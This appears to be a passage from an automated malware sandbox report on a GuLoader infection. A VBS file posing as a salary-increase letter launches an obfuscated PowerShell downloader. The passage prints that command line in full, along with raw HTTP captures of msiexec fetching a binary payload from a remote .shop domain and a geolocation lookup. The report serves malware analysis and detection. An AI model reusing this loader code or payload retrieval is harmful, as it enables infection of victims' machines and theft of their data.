                                                                                      Data Ascii: CSh1/Qkodfvp2zrEgytpw0+r7i4TQO0imTh18coAC9bEnTXhFKJf3t4dW1wTk4gLqrkso+aNIwyi+UbQcpPhdMK8jwd5wGrll55TgcKUxWNctdCxOmNUABCcfi+NbiYz/+0riSkY01BltOelF7SiWswgauO1vPRoYse56TUQap2ozaB1FUrBZdiAaZek36rlFkx5r6NQ5JRzuPes+g3v/eh2njuP6ftbnxzkuq5f87gPdmQjNV4
                                                                                      Oct 10, 2024 09:27:23.926330090 CEST1120INData Raw: 37 51 6b 75 38 59 66 72 4a 59 31 6c 33 4a 68 56 2f 51 4b 7a 67 77 49 6b 48 58 35 7a 49 6d 49 66 48 6c 64 67 72 5a 78 36 65 42 5a 2f 41 72 31 63 4e 5a 63 49 5a 64 54 52 64 59 49 50 53 6b 42 67 4b 58 4d 57 4a 35 38 77 34 4c 72 47 6d 73 44 61 50 58
                                                                                      Data Ascii: 7Qku8YfrJY1l3JhV/QKzgwIkHX5zImIfHldgrZx6eBZ/Ar1cNZcIZdTRdYIPSkBgKXMWJ58w4LrGmsDaPXimHds/ZZ8c2H4DnSDhFjacuM3e4kDUyk7EaV6EHdOVVb394hc3/lHBN2LVwcfN4RTWNmy8MM0ouQh1+4uWssbMA9umIKEN4iJWlV/RN1rhW8+N4Sz+Ac6sQb1jabkcJVZPJvN+TE8eD5NyAlqEZV+DHOGd9yMH6zq
                                                                                      Oct 10, 2024 09:27:23.926346064 CEST1236INData Raw: 48 52 4e 68 44 74 61 4f 4c 4c 31 62 37 32 55 6a 6e 51 61 6e 59 4c 69 6f 66 55 34 63 79 34 49 6f 76 34 38 7a 79 32 42 47 54 62 75 44 55 6b 6f 52 4f 4b 4b 74 69 4d 63 73 78 76 4d 6b 43 57 68 77 35 70 73 68 2f 37 74 52 4e 75 6e 2b 66 37 6b 64 34 68
                                                                                      Data Ascii: HRNhDtaOLL1b72UjnQanYLiofU4cy4Iov48zy2BGTbuDUkoROKKtiMcsxvMkCWhw5psh/7tRNun+f7kd4hfrg1AxNu5arCG9bZswuyQcJ37uDomShvrX4YDfWrf2bBSWCtOutjG9oZO1AORLnsyzn6ZFXiCG/LgJL2E2jt2Chp3ieiqiVGE3C8lgqy3hce7FC0xBvWNpO5wlRI81QA+u0gqMo1le31xmgYZ+DzfJdjf4cLC9zY7
                                                                                      Oct 10, 2024 09:27:23.926362991 CEST1236INData Raw: 57 35 55 57 4e 61 49 58 53 47 42 72 59 34 66 38 47 74 67 41 34 4f 76 39 6d 61 47 74 73 4c 34 59 52 44 75 49 4d 5a 48 50 57 37 47 67 6f 51 4c 4b 41 71 69 44 61 7a 75 51 4b 67 44 63 75 47 38 4a 4d 64 68 50 66 36 5a 78 50 4b 75 6f 79 6c 65 6f 73 47
                                                                                      Data Ascii: W5UWNaIXSGBrY4f8GtgA4Ov9maGtsL4YRDuIMZHPW7GgoQLKAqiDazuQKgDcuG8JMdhPf6ZxPKuoyleosGhixIwykHBqnB8PL3UVSlXaNQ0MNZdYZoTatALMbh9QFcFjckZCALl3hzF7l3J6DJ2krS6zU867SFUfs6w3D7Gpf0BqRF19jfL/fZ3iGUBNyLXu+FXuuSbpM7qrWvOmQPnYI17mU1BBQWrg5dqRsds53Lerr2cPWRc
                                                                                      Oct 10, 2024 09:27:23.926377058 CEST1236INData Raw: 76 39 52 65 66 71 7a 76 6a 44 58 61 65 62 65 2f 68 31 39 55 38 36 51 51 63 39 59 39 58 62 44 56 45 37 36 49 6e 77 61 66 6a 38 41 69 39 48 41 6e 6e 6c 33 6b 35 77 31 2b 66 4f 78 6d 4d 64 55 32 72 4a 55 46 52 67 4b 46 76 51 79 74 2f 66 4b 75 76 65
                                                                                      Data Ascii: v9RefqzvjDXaebe/h19U86QQc9Y9XbDVE76Inwafj8Ai9HAnnl3k5w1+fOxmMdU2rJUFRgKFvQyt/fKuveDd+S0l/Qkodf0JKHX9CSh1/Qkodf0JKHX9CShyao7fQTgkDOfH3yWW5xQUWfzI5KvHbxddRFnYVf0MM+lDrV/N4h+XB/OhN2etv1FtbZQwwfzxbP1Hn+/e83zE7YB2hKhBIpp6wQFv14UAf0EoW3BDhud+yfpYwCn
                                                                                      Oct 10, 2024 09:27:23.926393986 CEST1236INData Raw: 43 53 68 31 2b 77 4a 6c 76 33 57 39 57 62 52 78 4a 55 6d 4d 55 5a 72 6e 7a 65 49 66 75 78 75 55 52 65 51 76 51 5a 4a 73 77 39 69 51 68 64 77 4c 78 36 5a 72 77 64 64 2f 62 35 39 76 36 30 2b 72 76 6f 6c 4d 2b 46 41 68 62 71 55 58 76 57 65 75 6a 6b
                                                                                      Data Ascii: CSh1+wJlv3W9WbRxJUmMUZrnzeIfuxuUReQvQZJsw9iQhdwLx6Zrwdd/b59v60+rvolM+FAhbqUXvWeujk1tRdSYZf0MA9L1szYd4696UREhN1XTXBo9bSYuOpe2cpPQFMPbJL42rcDlQRStbmUzr9mv2T6q2Z8Pv5R1Vp0eQ5vZWw3O5QugVZD59d0JI8pAxyWQ5pDBSNihN21ZoRKN45hl8OJcAb1jKTjcJUUvRUrK2jtVjVH
                                                                                      Oct 10, 2024 09:27:23.931565046 CEST1114INData Raw: 4a 61 39 50 6c 34 6a 78 4f 44 65 39 34 76 4e 36 59 63 6a 34 5a 51 47 70 59 33 76 38 42 4a 35 41 43 69 2f 49 54 59 45 6f 7a 4d 54 35 49 6c 45 6e 67 4a 6d 51 38 32 4e 36 2f 49 48 66 70 56 66 4e 37 38 74 75 66 33 4d 6c 54 52 34 56 48 47 4f 4a 46 52
                                                                                      Data Ascii: Ja9Pl4jxODe94vN6Ycj4ZQGpY3v8BJ5ACi/ITYEozMT5IlEngJmQ82N6/IHfpVfN78tuf3MlTR4VHGOJFRZL9kYREGqYBHETZRZE2B6kcGmQ0O2lGBDg6+0aMaZgrkj65ZhVqQLmmqMrlBjVY41iGmuu75TWIQbAO6gxacdRZPBiZVAQGDKTv1c1wGrKpNfflReWVwao4GtDTWGBSBDg6+2YsaOVVj/11vLIlbmPrQSBoAbBkBL


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.649893104.21.2.6803976C:\Windows\SysWOW64\msiexec.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 10, 2024 09:27:55.860023022 CEST187OUTGET /NrFLrAda/NwiqNYffVolUqcmi160.bin HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                      Host: ln6b9.shop
                                                                                      Cache-Control: no-cache
                                                                                      Oct 10, 2024 09:27:56.635476112 CEST1236INHTTP/1.1 200 OK
                                                                                      Date: Thu, 10 Oct 2024 07:27:56 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: max-age=14400
                                                                                      CF-Cache-Status: EXPIRED
                                                                                      Last-Modified: Thu, 10 Oct 2024 07:27:56 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X3zlE7L4Zx6NbYN6rScFhtp%2B9c2G1fuG%2FRAIU6773SMFuYayO0w9zalbCkC%2BX7y%2BZaTZ77NodU6HT2S1np7sm6RDWjf2Liwx%2FuxSV6rAo6kP0TUObijQy5%2FaUDBp"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8d04e408bf864225-EWR
                                                                                      alt-svc: h2=":443"; ma=60
                                                                                      Data Raw: 33 38 63 30 0d 0a 7f 98 80 3e 18 01 bd fb 70 a0 6e 5b 8a 40 00 5a 6b 4f 07 d6 1e 51 9f 17 c6 f0 1a 4d c8 41 d3 71 fd e6 a9 c2 f2 c9 ee 4d ba 0c 1e f7 21 36 6d 7d 0a a3 73 02 d0 0b e1 9f 17 e5 42 78 32 8c 29 71 fd d6 82 c3 fb ef bc 75 f9 e1 cc 01 8f d6 a0 32 a6 9f 03 21 4c 26 ea 90 93 d0 7e 9c 2d b2 1f 0e ce b7 b3 07 b9 a8 0c fa 3c b2 2c 7b 7f 5d 39 93 40 e2 65 d3 20 95 23 ec f8 a9 03 0a a6 20 f0 73 66 a6 6c 11 1a 1b 8b 7c 15 43 bc c7 98 4b 2b 57 8b 93 09 37 e5 ff 56 1d 8e a8 ca b8 12 cf 8c 33 7b 5b 5f ab fe f7 28 a3 a7 fb 84 81 5e ad e6 b9 fe db dc 21 d8 f2 af 6a d0 43 85 22 a8 16 d6 85 d6 f1 32 d4 4f bb a7 28 a6 75 d3 3a 1b 5e 16 c9 46 59 47 90 34 c2 82 8d 45 1b 0e 78 5a 46 ca 6a 56 ca 0c af 6b 47 3b 6c 48 c9 52 c1 4d 45 ed 6a 0b 5a 46 e5 23 a6 8b b1 79 c0 d8 6b d4 d2 0a d4 7a 49 a6 fa c1 4d 73 ac 2f 84 48 bd 77 2c 62 b2 8e 24 8f 1e a1 57 bd 43 0e ac ee a2 ec 2a c2 17 45 2b 7e d8 ba bf 19 e1 d7 b5 19 ff 14 52 75 b2 d0 8e 62 a7 08 3d 03 ce 42 fa 3d ea d8 17 dd f0 a2 6a 0b 46 16 0a 85 2d 38 7e 22 d2 [TRUNCATED]
                                                                                      Data Ascii: 38c0>pn[@ZkOQMAqM!6m}sBx2)qu2!L&~-<,{]9@e # sfl|CK+W7V3{[_(^!jC"2O(u:^FYG4ExZFjVkG;lHRMEjZF#ykzIMs/Hw,b$WC*E+~Rub=B=jF-8~"$<}+m[=8K)*9(pgi;F.h1,+?E]p}pb[Wcy5XUHcXRmN-Yi#.47`XV]z(Ci#`xKUVE+DBY[#=@E!A/{^5z!v/vTNtw%BWU*
                                                                                      Oct 10, 2024 09:27:56.635490894 CEST1236INData Raw: 8f 44 ab fe 9a 78 81 63 7c 0f c3 94 9d c3 d8 c6 2c 58 09 98 d8 24 92 e9 a6 0f 17 c6 d2 90 44 2a e9 4f 70 ae 07 12 ad ef 23 b0 08 94 db 32 21 18 83 07 81 1b 7e 50 04 05 8b 78 57 f1 87 31 39 f1 cc 0e 8e e2 47 5a 98 42 d2 4e 15 e5 8c 6b 4c 64 c9 a3
                                                                                      Data Ascii: Dxc|,X$D*Op#2!~PxW19GZBNkLd4p<:`4UR@DzQl,x,sZm\IKsPCAXb@q}'6+ZWcXL~ZgI_t:VL|e(5
                                                                                      Oct 10, 2024 09:27:56.635500908 CEST1236INData Raw: 9d 72 c5 0c 44 48 53 aa a4 d0 dc 3d 5d 85 e9 89 ee 00 57 14 6a 38 14 84 23 3d 9b d0 8c 09 88 9c 6c f5 27 86 c8 b4 af 1e 48 75 6d 4b 63 a6 d2 93 03 23 0a 49 71 b4 24 be 4a ca 60 98 42 ea 78 46 5e db e8 99 31 4d aa 03 df f5 e0 96 4d 94 93 28 f1 58
                                                                                      Data Ascii: rDHS=]Wj8#=l'HumKc#Iq$J`BxF^1MM(X$lPD^jI3;~{D}C[B<-Gn*m'(O~}FY.M<l!VEDRpB:}Xx[ec>URNTIcids
                                                                                      Oct 10, 2024 09:27:56.635514021 CEST1236INData Raw: 04 7b b0 f8 75 27 e9 4e da f3 7a 84 c2 b0 56 3d 15 5f 6e 75 71 e0 e2 11 65 fc e7 8c b5 78 3b 06 24 4e 51 40 d4 19 d9 eb bf 15 55 eb 5d ee b9 e1 f0 20 c7 20 27 a9 2b 96 9a 3c bf 4a 47 75 85 f4 ae ea 3e ee 80 12 14 94 84 71 ee eb 84 a3 b7 00 e2 0c
                                                                                      Data Ascii: {u'NzV=_nuqex;$NQ@U] '+<JGu>qsn$_NcysXT<Y<La|eo_(N-%n,o~X/pSd,u(P3LU$Z{<LJtQ-D#%:-2,M8.
                                                                                      Oct 10, 2024 09:27:56.635524035 CEST896INData Raw: c9 0c 18 44 be 68 a2 c7 12 b0 c1 5c bf ba 7b 14 91 87 6e 05 d8 dd d9 7f 9c 2f 86 20 73 97 a6 d4 cf ef 9d ba af f4 aa 5e 9f f8 d7 8b 3a f9 d2 8d 77 05 fb 51 6c 3d 45 b7 a0 2c 64 ef 20 20 da 16 c6 fc e6 f0 b4 f3 3b 01 78 74 46 96 fd 2b 72 92 3e e0
                                                                                      Data Ascii: Dh\{n/ s^:wQl=E,d ;xtF+r> <?5$#qLN?j'$d,a-b>gXR2#<(H9_v+/gW,9n4Lk;?6@t(Z6_ZnQ3
                                                                                      Oct 10, 2024 09:27:56.635536909 CEST1236INData Raw: 40 7e b2 d6 81 ec 3c bc 7f 1f bf 0c 84 ea 4c d1 85 cd 6a ab 56 d2 1d fb 61 28 98 60 9e 87 c7 91 5f 84 a9 25 b8 a7 d3 74 53 53 43 81 86 d9 ba 26 a7 65 a0 84 73 5a 03 cd be 5d 3e 29 1f 1b c8 bc c2 7d 68 86 44 38 0f 69 dd a8 64 af ac b5 7b 69 f5 03
                                                                                      Data Ascii: @~<LjVa(`_%tSSC&esZ]>)}hD8id{i6}%{x&jnpKU+D="bYmBNU'9@3d{D!AJUCSkhSNnJ/NH.%(=UNO++$rW&..O`#;
                                                                                      Oct 10, 2024 09:27:56.635550022 CEST1236INData Raw: 05 66 71 90 bc a8 1d f6 0a e1 9d 1d 3f 46 0d 13 14 48 58 0c d5 92 71 1c 49 ef bb 1d f9 fc 46 93 cd b3 34 c1 64 f5 83 75 46 ae d3 d2 8d 95 b0 8c 4c 01 fc ef e9 fe 11 b7 9b 8a 0d 21 2b c3 49 77 96 22 4c 26 61 5e 57 10 0a 89 d2 c7 13 e6 d0 4a 4c f8
                                                                                      Data Ascii: fq?FHXqIF4duFL!+Iw"L&a^WJLP4kM]9xne,UE~U]MGzMca$%YoDc=s*$Q&!*g>h`2#[2* TpL&QMwkT]i=+;+s@0C \V`%m
                                                                                      Oct 10, 2024 09:27:56.635561943 CEST1236INData Raw: 57 43 0d 7b 3a 34 ef 18 17 92 86 29 86 ef e6 ce b1 8c 56 00 40 2e e7 ca 45 67 fd 00 1a 91 32 79 80 4a 68 6f 23 15 c2 a1 6a 29 f7 a6 b6 d9 60 26 73 91 06 37 20 54 d4 c3 21 27 c6 09 9d 1d 24 c9 d4 02 5e b2 e4 91 68 7c c7 cd c4 f5 3f 28 2d 5d ec 43
                                                                                      Data Ascii: WC{:4)V@.Eg2yJho#j)`&s7 T!'$^h|?(-]CZ,M8o 3C82Ba:F|Ee>z`p)B.?\1EL<<(!2QKTWonH].]{X%<=(|#)S1Faf!,`-
                                                                                      Oct 10, 2024 09:27:56.635574102 CEST1236INData Raw: d9 9c 6f 46 10 46 55 0c ad 5e d2 28 ea 8d 8a e2 e4 a7 3b e6 67 9f 08 5d 53 29 ba 35 b3 24 c4 08 0e 12 b7 35 df bb 6c a2 7d 36 7a 45 2f 84 12 ce 23 ad a5 36 ed db 86 83 62 4b 2e 04 3d fd fa 4c 8c d0 fa 54 16 61 c7 59 aa 24 d2 32 64 2d ff f0 9e eb
                                                                                      Data Ascii: oFFU^(;g]S)5$5l}6zE/#6bK.=LTaY$2d-fA]:,r T=Yd)je,<n,m_;!z^>}M+JQ-1{4m/!dqw][I]dT<?*2N48Bn8mwd<q
                                                                                      Oct 10, 2024 09:27:56.635585070 CEST1236INData Raw: ca 23 6d cb 66 50 4d 90 e1 45 aa 87 7e de cc e6 1a b5 80 11 29 8c 08 1f 4e 8f d3 b4 c9 d5 72 1d 90 ed 17 76 5b f1 7a b1 2b fa fd 32 73 60 2c 2b 4a bd c3 95 44 84 2a 03 97 51 c3 60 af d5 9b a9 79 a1 78 0f 04 0e 07 44 53 2f aa 5d fc e9 56 25 19 b5
                                                                                      Data Ascii: #mfPME~)Nrv[z+2s`,+JD*Q`yxDS/]V%<DQQE&e|$Gtnl6%vgca8@KjX^35B;*bp|dTCZ13U`s8X^IK^QDh|BZePe?5VF
                                                                                      Oct 10, 2024 09:27:56.635618925 CEST1236INData Raw: 40 e5 84 c2 cd 9a a1 41 9d 6f 4c 37 5e e5 61 71 95 18 7a ed ac ec 0e 5d 9f ab c8 43 7f f6 4d 14 95 da 01 44 11 52 51 8e a9 22 3c 53 13 39 44 4b 46 52 f3 90 11 90 53 08 d7 a1 16 67 22 a1 0f f4 0a 5a b3 d7 2e 49 79 f1 99 45 8f 18 ec ec 14 ca eb 22
                                                                                      Data Ascii: @AoL7^aqz]CMDRQ"<S9DKFRSg"Z.IyE"kT&c{PWTTAHJM>^z,e*DQ\^P*Mff\}b.X:KS%n|i!Qb=?$u94]']d6:NE8l#(0gY~GHtL2


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.649927178.237.33.50803976C:\Windows\SysWOW64\msiexec.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 10, 2024 09:28:01.182200909 CEST71OUTGET /json.gp HTTP/1.1
                                                                                      Host: geoplugin.net
                                                                                      Cache-Control: no-cache
                                                                                      Oct 10, 2024 09:28:01.781619072 CEST1170INHTTP/1.1 200 OK
                                                                                      date: Thu, 10 Oct 2024 07:28:01 GMT
                                                                                      server: Apache
                                                                                      content-length: 962
                                                                                      content-type: application/json; charset=utf-8
                                                                                      cache-control: public, max-age=300
                                                                                      access-control-allow-origin: *
                                                                                      Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                                      Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:03:27:18
                                                                                      Start date:10/10/2024
                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs"
                                                                                      Imagebase:0x7ff6bc840000
                                                                                      File size:170'496 bytes
                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:2
                                                                                      Start time:03:27:19
                                                                                      Start date:10/10/2024
                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyG GnsPieTH le sk=Eja(MastT,aeVensKubTTra- E,pXerA ort fdH mo F $WallIndy UnnsyrlVacaMilaHaesCe EFranB lsBen)sam ');while (!$Uforsonligste) {Unmudded (Perspicable ' Je$AnngMicl rao T.bNonaOmol ni:DavVFraiAr nR toansss aiFjetM kiNeme dksFno=I.t$Portplorsynu,rie la ') ;Unmudded $sabotren;Unmudded (Perspicable 'Zo sTusT reaPenRDertsp,-BorsCanl .aEU sEUnlp eg Tpp4H.l ');Unmudded (Perspicable ' e$NicgTunLUnioIntbsinaBruLCar:Oveu,ivf oOak r nfsFixosulNUnslsquiUplg ilsartt ubesal=A.d(DemtTheeHaes.unTRek- efp AraTr,tRegH Mu Per$ UvlBaryobsNTinLH.sa bla Ops UdeConNTols so) s ') ;Unmudded (Perspicable 'Lys$Ko,gA,bL ftO M BspiA ZoLEll: ToFMoroin rHjeKF glGlae taLBensOl.Es eRbo =Phy$,ntgUnsLHoooUnhbPunAW tLsa :Ac G muyIneg onI DesUdp+men+Bar% ek$Mu tForUFliAErgR ute.rugFjl.E lC teoCajUFjaNHe ts i ') ;$stigma=$Tuareg[$Forklelser];}$Flukily135=317872;$Dekodere=28798;Unmudded (Perspicable 'Var$ForGFrdlPhoOKonB slABall on: .lw.elAAchUCatKPerit ttsko Rau=Ext HinGCusEPretT.o-BovCUpsONumnTretPerE aan NeT Tr En$soulOpgy.arN Brl LaA evaKass,emEswinpapsBar ');Unmudded (Perspicable ' o$ R gAt l osoBrobKriaA rlskv:Obes L msaxe glschtBipe D oscas,sotshaeAlb Bre=smu Oms[ kksgenyAr s HetDraebe mDeg.sjaCEf,oBesnP.avAn e,ibr NetMrk]War: Li:IntFAttrDeloDvrmM,sB G a f.s KoePho6 or4radsHydtMisrPsyiOven afglit(udr$s iWPe aT,euBarkWoriUnctGon)Ita ');Unmudded (Perspicable 'kl $Bjrg.rhl BooUkrBD.va,aalPor:A,bBJakOR.ngd isUbeaHonmH nlBe eForRKomePen4Pre2Bie Reo=Rus M k[KursafnyLeas xttsepELinMDy .m.sTKame axE utCha. NoEsupN s,cDiso.ntDli,ITuanOscgBru]Ung: Bi:K ias isCracpu.IsmyIFoy.Im G lEs,gtPossshrttetRTrdi.liNM.lgTys(Fid$MorsFormL eEk nLOl TOldEBygosyns PeT arETon)B.n ');Unmudded (Perspicable 'Oen$Fidg MelOd Osymb itaBetl ak:Ta,dThlI onsEtcsWooiUltmBygI oL iEAderHinEMyoneffdTilE Fo=sun$ riBCh,o Amgs,asOveAAbsm AnlcarEsieRPyreLoe4Pan2Rio. prssymUBlobGresVe TMy rRekI un svg Ca( sv$.emFM llDaguBnkK uziGrnLst Y d 1Gen3 st5 yr, an$ ndDP.we D,k apo spD .oeIchRK je Bu)he ');Unmudded $dissimilerende;"
                                                                                      Imagebase:0x7ff6e3d50000
                                                                                      File size:452'608 bytes
                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2325392654.000001ACF561F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:3
                                                                                      Start time:03:27:19
                                                                                      Start date:10/10/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff66e660000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:4
                                                                                      Start time:03:27:27
                                                                                      Start date:10/10/2024
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
